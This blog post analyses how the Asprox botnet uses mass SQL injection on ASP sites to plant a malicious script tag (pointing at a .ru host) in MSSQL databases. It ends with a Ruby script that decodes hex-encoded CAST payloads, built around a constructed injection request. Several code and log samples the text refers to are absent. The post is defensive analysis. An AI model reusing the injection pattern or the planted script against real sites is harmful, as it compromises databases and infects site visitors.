Mass SQL Injection And Asprox Bot

Asprox is one of the botnets that uses mass SQL injection to inject a malicious *.js script into MSSQL database servers. Normally an Asprox bot searches for any *.asp script that is vulnerable to SQL injection and uses it to inject the malicious *.js script and iframe into the database. A typical SQL injection looks similar to the log below:

It’s a little bit annoying to decode all the hex chars. It’s obvious that the SQL injection input is meant to bypass string-based content filtering :). Out of curiosity about this SQL injection, I managed to write a little Ruby code to decode it (using the normal trick of converting the hex input passed to the cast function). Below are the result, a sample usage of the code and sample output:

Since this SQL injection uses the hex trick twice (a double payload), I need to re-execute the code for this one:

All the output needs to be concatenated again with the previous string, such as AS vaRcHaR(4000));eXeC (@s);--. So the final SQL statement will look similar to this:

From the output, we can see that the attacker tries to inject <script src=http://www.bannert.ru/ads.js> into the database. This script is later used as an iframe on the compromised database/web server to silently fetch ads.js. Unfortunately, ads.js was no longer available when this blog entry was posted.

Below is the simple Ruby code for decoding the hex values. You need to supply the input found within the cast functions.

Here is how you can use the code:

* Don’t forget to use quotes (‘ ’) when keying in your input.
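
The decoding described in this post, as an added Ruby example that is not the author's original script: it pulls the hex literal out of each CAST(0x... AS VARCHAR(n)) and repeats on the result, which handles the double payload in one run. It goes beyond the post by accepting a whole URL-encoded log line and NVARCHAR (UTF-16LE) literals; the sample request, its harmless PRINT statement and the MAX_LAYERS limit are constructed assumptions.

```ruby
# Added example (not the post's original script). Sample input is constructed.

# Matches CAST(0x<hex> AS VARCHAR(n)) or NVARCHAR(n); keyword case is ignored
# because the injected SQL mixes case (vaRcHaR, eXeC).
HEX_CAST = /CAST\s*\(\s*0x((?:\h\h)+)\s+AS\s+(N?)VARCHAR\s*\(\s*(?:\d+|MAX)\s*\)\s*\)/i
MAX_LAYERS = 5 # hypothetical safety limit on nesting depth

# Undo URL encoding from a log line without raising on stray '%' characters.
# '+' is treated as a space, as in form encoding.
def url_decode(text)
  text.b.tr("+", " ").gsub(/%(\h\h)/) { $1.hex.chr }
end

# Convert one hex literal to UTF-8 text. NVARCHAR data is UTF-16LE.
def hex_to_text(hex, wide)
  raw = [hex].pack("H*")
  raw.force_encoding(wide ? "UTF-16LE" : "ISO-8859-1")
     .encode("UTF-8", invalid: :replace, undef: :replace)
end

# Return each decoded layer, outermost first, until no hex CAST remains.
def decode_layers(input)
  layers = []
  current = url_decode(input)
  MAX_LAYERS.times do
    casts = current.scan(HEX_CAST)
    break if casts.empty?
    current = casts.map { |hex, wide| hex_to_text(hex, !wide.empty?) }.join("\n")
    layers << current
  end
  layers
end

# Helper used only to build the constructed two-layer sample below.
def to_hex(text)
  text.unpack1("H*")
end

INNER  = "PRINT 'constructed inner statement'"
MIDDLE = "DECLARE @t VARCHAR(4000);SET @t=CAST(0x#{to_hex(INNER)} AS VARCHAR(4000));EXEC(@t);"
SAMPLE = "GET /page.asp?id=1;DECLARE%20@s%20VARCHAR(4000);SET%20@s=" \
         "CAST(0x#{to_hex(MIDDLE)}%20AS%20vaRcHaR(4000));eXeC(@s);--"

if __FILE__ == $PROGRAM_NAME
  decode_layers(SAMPLE).each_with_index { |sql, i| puts "layer #{i + 1}: #{sql}" }
end
```

Each returned layer is the SQL text that the previous layer would have passed to EXEC, so the last element is the statement that finally runs against the database.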
